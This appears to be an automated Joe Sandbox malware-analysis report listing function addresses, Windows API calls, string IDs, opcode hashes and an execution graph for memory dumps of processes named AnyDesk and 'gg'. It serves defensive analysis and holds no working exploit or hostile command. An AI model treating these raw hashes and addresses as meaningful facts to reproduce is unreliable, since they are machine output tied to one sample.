                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-2556327735
                                                                                                                                                                                                                                                  • Opcode ID: 7def1b04ac0174b99c3f24078333fbb29c8fa97dcca5334702dcd1fba0f07066
                                                                                                                                                                                                                                                  • Instruction ID: 091c7b2af80e1293eb70286dc1631fbcf5f406f6ea72f18b4f40f02420ad541d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7def1b04ac0174b99c3f24078333fbb29c8fa97dcca5334702dcd1fba0f07066
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F01102323087105A86309EACF84091EB7E9FFE0B71B110A3FE696C7690FB31E41487A5
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C3D170 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 69C3D184
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 69C3D195
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                  • String ID: kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 1646373207-1793498882
                                                                                                                                                                                                                                                  • Opcode ID: f30a3c06ee2358b4277e4dc90dee4e5e2e04f0d789673c5e1cf84901b2c94257
                                                                                                                                                                                                                                                  • Instruction ID: e26339ae3e19aadfd5a3f961de014e71a081dce230d7cdeba7323630ec147df2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f30a3c06ee2358b4277e4dc90dee4e5e2e04f0d789673c5e1cf84901b2c94257
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C018475A00219BBEF109E99EC44FAE7BBCFB81660F500196ED08D7140EB70D605C762
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C66411 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 69C66431
                                                                                                                                                                                                                                                    • Part of subcall function 69C22340: GetLastError.KERNEL32(?,00000000), ref: 69C223D6
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\misc\uuid.cc, xrefs: 69C6644B
                                                                                                                                                                                                                                                  • UuidCreate, xrefs: 69C6645F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateErrorLastUuid
                                                                                                                                                                                                                                                  • String ID: UuidCreate$c:\b\build\slave\win\build\src\third_party\crashpad\crashpad\util\misc\uuid.cc
                                                                                                                                                                                                                                                  • API String ID: 3740028514-535133227
                                                                                                                                                                                                                                                  • Opcode ID: db96e00cc6b4b287fff55fea4dfb09eb894066b00a5166a0ce01235829c5f081
                                                                                                                                                                                                                                                  • Instruction ID: 736e058262f9c5d3e6658a3b8a826c1acc9708368b7754c3c8a648ffa041588c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db96e00cc6b4b287fff55fea4dfb09eb894066b00a5166a0ce01235829c5f081
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93014C365407089ADB14DF64FD81FFEB3A8EF06314F005069EC05AB181EE72AA0AC670
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C24D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 69C24E2C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                                  • Opcode ID: 76d01b083fbdb7dacd4939e3925203240dfc5bdb5f6f78852d43e53a3b2d658d
                                                                                                                                                                                                                                                  • Instruction ID: df71e3fa241dfaefd0401e09e3a2ce4c1518e09a2269601a90e033551ba63e84
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76d01b083fbdb7dacd4939e3925203240dfc5bdb5f6f78852d43e53a3b2d658d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8BD05E385402287F2A34DAA9FCC0C4E769D6A181547C08819BF049F185FBA4D8006AA1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C67450 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C62CC2: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,69C6747F,?,?,?,69C2133F), ref: 69C62CC7
                                                                                                                                                                                                                                                    • Part of subcall function 69C62CC2: GetLastError.KERNEL32(?,69C6747F,?,?,?,69C2133F), ref: 69C62CD1
                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,69C2133F), ref: 69C67483
                                                                                                                                                                                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,69C2133F), ref: 69C67492
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 69C6748D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                                                                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                  • API String ID: 450123788-631824599
                                                                                                                                                                                                                                                  • Opcode ID: f3f1846b3b7ea1082508326226399beb31eeb927324f233f83340a69e436c061
                                                                                                                                                                                                                                                  • Instruction ID: 7846d06c2348b54a9dbf1932d71fe144ddaec73802d863accbcd7f243446e43d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3f1846b3b7ea1082508326226399beb31eeb927324f233f83340a69e436c061
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92E0ED702007908BE7308F39E18875A7BF8AF91300F008C1CD45ACA600FBB4D0448FB2
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C3FC31 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 69C3FC3D
                                                                                                                                                                                                                                                    • Part of subcall function 69C3FBB2: std::exception::exception.LIBCONCRT ref: 69C3FBBF
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 69C3FC4B
                                                                                                                                                                                                                                                    • Part of subcall function 69C42BD6: RaiseException.KERNEL32(?,?,?,69C413B7,00000000,00000000,00000000,?,?,?,?,?,69C413B7,?,69C7B2E0), ref: 69C42C35
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: Unknown exception
                                                                                                                                                                                                                                                  • API String ID: 1586462112-410509341
                                                                                                                                                                                                                                                  • Opcode ID: 0a57ce79f315d66c702265ecb659309d2366396ac86aef17a71c0267804ad534
                                                                                                                                                                                                                                                  • Instruction ID: 59df7f41faa0e027d69ac3f5af35e729348e72ed24c01e18bfb9704c83941158
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a57ce79f315d66c702265ecb659309d2366396ac86aef17a71c0267804ad534
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73D0A73CA002087BCB10DEE5F861D8C7B7C6E04204BC0C4A9A918C7040F770EA4686D1
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 69C54371 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?), ref: 69C54407
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 69C54415
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 69C54470
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                                                                  • Opcode ID: a252753ea3ddd9e00cfd7ed00269e276aa7313eab9b495e7fc1211c00705224e
                                                                                                                                                                                                                                                  • Instruction ID: dbe5af2d0f73d0db38a828bbd3e7a08039b1a47f7925168ebfa1512390c7572f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a252753ea3ddd9e00cfd7ed00269e276aa7313eab9b495e7fc1211c00705224e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94410631644216AFDB118F65E844BAA7BB9FF41360F108168FD6A9B1A0F7308D31C775
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:14.5%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:120
                                                                                                                                                                                                                                                  Total number of Limit Nodes:7
                                                                                                                                                                                                                                                  execution_graph 82857 175d300 DuplicateHandle 82858 175d396 82857->82858 82714 63f30a8 82715 63f30b3 82714->82715 82716 63f30c3 82715->82716 82718 63f077c 82715->82718 82719 63f30f8 OleInitialize 82718->82719 82720 63f315c 82719->82720 82720->82716 82704 175d0b8 82705 175d0fe GetCurrentProcess 82704->82705 82707 175d150 GetCurrentThread 82705->82707 82708 175d149 82705->82708 82709 175d186 82707->82709 82710 175d18d GetCurrentProcess 82707->82710 82708->82707 82709->82710 82713 175d1c3 82710->82713 82711 175d1eb GetCurrentThreadId 82712 175d21c 82711->82712 82713->82711 82721 1754668 82722 1754684 82721->82722 82723 1754696 82722->82723 82727 17547a0 82722->82727 82732 1753e10 82723->82732 82728 17547c5 82727->82728 82736 17548b0 82728->82736 82740 17548a1 82728->82740 82733 1753e1b 82732->82733 82748 1755c54 82733->82748 82735 17546b5 82738 17548d7 82736->82738 82737 17549b4 82737->82737 82738->82737 82744 1754248 82738->82744 82742 17548b0 82740->82742 82741 17549b4 82741->82741 82742->82741 82743 1754248 CreateActCtxA 82742->82743 82743->82741 82745 1755940 CreateActCtxA 82744->82745 82747 1755a03 82745->82747 82749 1755c5f 82748->82749 82752 1755c64 82749->82752 82751 175709d 82751->82735 82753 1755c6f 82752->82753 82756 1755c94 82753->82756 82755 175717a 82755->82751 82757 1755c9f 82756->82757 82760 1755cc4 82757->82760 82759 175726d 82759->82755 82761 1755ccf 82760->82761 82763 1758653 82761->82763 82766 175ad00 82761->82766 82762 1758691 82762->82759 82763->82762 82770 175cde0 82763->82770 82775 175ad28 82766->82775 82778 175ad38 82766->82778 82767 175ad16 82767->82763 82772 175ce11 82770->82772 82771 175ce35 82771->82762 82772->82771 82801 175cfa0 82772->82801 82805 175cf90 82772->82805 82776 175ad47 82775->82776 82781 175ae30 82775->82781 82776->82767 82780 175ae30 2 API calls 82778->82780 82779 175ad47 82779->82767 82780->82779 82782 175ae41 82781->82782 82783 175ae64 82781->82783 82782->82783 82789 175b0c8 82782->82789 82793 175b0b8 82782->82793 82783->82776 82784 175ae5c 82784->82783 82785 175b068 GetModuleHandleW 82784->82785 82786 175b095 82785->82786 82786->82776 82790 175b0dc 82789->82790 82792 175b101 82790->82792 82797 175a870 82790->82797 82792->82784 82794 175b0dc 82793->82794 82795 175b101 82794->82795 82796 175a870 LoadLibraryExW 82794->82796 82795->82784 82796->82795 82798 175b2a8 LoadLibraryExW 82797->82798 82800 175b321 82798->82800 82800->82792 82802 175cfad 82801->82802 82803 175cfe7 82802->82803 82809 175c8d8 82802->82809 82803->82771 82806 175cfa0 82805->82806 82807 175c8d8 2 API calls 82806->82807 82808 175cfe7 82806->82808 82807->82808 82808->82771 82810 175c8dd 82809->82810 82812 175d8f8 82810->82812 82813 175ca04 82810->82813 82814 175ca0f 82813->82814 82815 1755cc4 2 API calls 82814->82815 82816 175d967 82815->82816 82816->82812 82817 63f1060 82818 63f107a 82817->82818 82821 63f10b1 82818->82821 82819 63f1096 82822 63f10ed 82821->82822 82823 63f14f8 82822->82823 82826 63f2d30 82822->82826 82832 63f2f58 82822->82832 82823->82819 82827 63f2d35 82826->82827 82838 63f2ff2 82827->82838 82828 63f2f91 82842 63f31bf 82828->82842 82829 63f2fc8 82829->82822 82833 63f2f7f 82832->82833 82836 63f2ff2 GetKeyboardLayout 82833->82836 82834 63f2f91 82837 63f31bf 3 API calls 82834->82837 82835 63f2fc8 82835->82822 82836->82834 82837->82835 82839 63f3031 82838->82839 82840 63f3044 GetKeyboardLayout 82839->82840 82841 63f3071 82840->82841 82841->82828 82843 63f31c9 82842->82843 82849 63f3390 82843->82849 82853 63f33a0 82843->82853 82844 63f32b6 KiUserExceptionDispatcher 82846 63f332f 82844->82846 82846->82829 82850 63f33c7 82849->82850 82851 63f33ff LdrInitializeThunk 82850->82851 82852 63f33f7 82850->82852 82851->82852 82852->82844 82854 63f33c7 82853->82854 82855 63f33ff LdrInitializeThunk 82854->82855 82856 63f33f7 82854->82856 82855->82856 82856->82844

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 065FDF00 Relevance: 2.9, Strings: 2, Instructions: 376COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: XX^q$XX^q
                                                                                                                                                                                                                                                  • API String ID: 0-1102689228
                                                                                                                                                                                                                                                  • Opcode ID: 8aa4fa37a454e38168ae8703e759da58e39fb9324f9d6981384c230168e64257
                                                                                                                                                                                                                                                  • Instruction ID: 460719b3e7b53f2164a72699e8560e2895260090f451fa61627dc7e47df67bde
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aa4fa37a454e38168ae8703e759da58e39fb9324f9d6981384c230168e64257
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCD1A030B10206AFDB54EB79D89466EB7E3FF80210F508929D5169B7A4DF70EC89CB94
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06693EE0 Relevance: .3, Instructions: 346COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1951092425.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b289fa1e0b16dc9fba7097722315d473c3d98348b663c0aba806d6153a7345d7
                                                                                                                                                                                                                                                  • Instruction ID: 11ff93f20f70649c0a2da122bd3010260516a398d1c4136c461953546e087165
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b289fa1e0b16dc9fba7097722315d473c3d98348b663c0aba806d6153a7345d7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAD19C35A002059FCB44CF79D984AAEBBF6FF89304B158569E815EB361DB30EC51CBA0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 065FC488 Relevance: .3, Instructions: 328COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1950049077.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_65f0000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8d49f59a14c2362850611e6659082bfeed3c48a8d5e66f5d1a0a8e38f9d8e863
                                                                                                                                                                                                                                                  • Instruction ID: a3c538e7fceb9807d35deedb803ad21f21b7644ac8966ebc6846a7319cb39632
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d49f59a14c2362850611e6659082bfeed3c48a8d5e66f5d1a0a8e38f9d8e863
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AC18D30B102069FDB54EF75D9847AAB7A2FF84300F409938D6069B765DB70E889CBA4
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Function 06697710 Relevance: 4.1, Strings: 3, Instructions: 363COMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 1062 6697710-6697720 1063 669772c-6697732 1062->1063 1064 6697722-6697729 1062->1064 1065 6697734-669773a 1063->1065 1066 6697767-669776e 1063->1066 1067 669773d-6697745 1065->1067 1068 6697771-6697791 1067->1068 1069 6697747-669774f 1067->1069 1074 6697793-6697796 1068->1074 1075 66977a6-66977a9 1068->1075 1069->1068 1070 6697751-6697755 1069->1070 1071 6697761-6697765 1070->1071 1072 6697757-669775e 1070->1072 1071->1066 1071->1067 1076 6697798-669779d 1074->1076 1077 66977fe-669781f 1074->1077 1078 66977ab-66977b1 1075->1078 1079 66977c1-66977c4 1075->1079 1076->1075 1083 669779f-66977a4 1076->1083 1092 6697821-6697824 1077->1092 1093 6697827-669782a 1077->1093 1078->1077 1080 66977b3-66977b8 1078->1080 1081 66977dc-66977df 1079->1081 1082 66977c6-66977cc 1079->1082 1080->1079 1084 66977ba-66977bf 1080->1084 1086 66977e1-66977e7 1081->1086 1087 66977f7 1081->1087 1082->1077 1085 66977ce-66977d3 1082->1085 1088 66977f9-66977fb 1083->1088 1084->1088 1085->1081 1090 66977d5-66977da 1085->1090 1086->1077 1091 66977e9-66977ee 1086->1091 1087->1088 1090->1088 1091->1087 1096 66977f0-66977f5 1091->1096 1094 6697849-669786b 1093->1094 1095 669782c-6697834 1093->1095 1100 669786d-669786f 1094->1100 1101 669788f-6697898 1094->1101 1097 6697843-6697846 1095->1097 1098 6697836-6697840 1095->1098 1096->1088 1104 66978dd-66978e6 1100->1104 1105 6697871-669788e 1100->1105 1102 669789a-669789f 1101->1102 1103 66978a1-66978d6 1101->1103 1102->1103 1103->1104 1106 66978e8-66978ed 1104->1106 1107 66978ef-6697938 1104->1107 1106->1107 1122 669798b-669799d 1107->1122 1123 669793a-6697950 1107->1123 1124 6697a48-6697a51 1123->1124 1125 6697956 1123->1125 1126 6697a5a-6697b15 1124->1126 1127 6697a53-6697a58 1124->1127 1128 669795d-6697960 1125->1128 1129 66979a0-66979a3 1125->1129 1130 6697973-6697976 1125->1130 1131 66979e7-66979ea 1125->1131 1132 6697b1c-6697b26 1126->1132 1127->1126 1128->1132 1136 6697966-6697970 1128->1136 1129->1132 1134 66979a9-66979b7 1129->1134 1130->1132 1133 669797c-6697988 1130->1133 1131->1132 1135 66979f0-66979fe 1131->1135 1133->1122 1133->1132 1134->1132 1138 66979bd-66979cf 1134->1138 1135->1132 1139 6697a04-6697a17 1135->1139 1138->1132 1141 66979d5-66979e4 1138->1141 1139->1132 1142 6697a1d-6697a30 1139->1142 1142->1132 1145 6697a36-6697a45 1142->1145
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000018.00000002.1951092425.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_24_2_6690000_gg.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
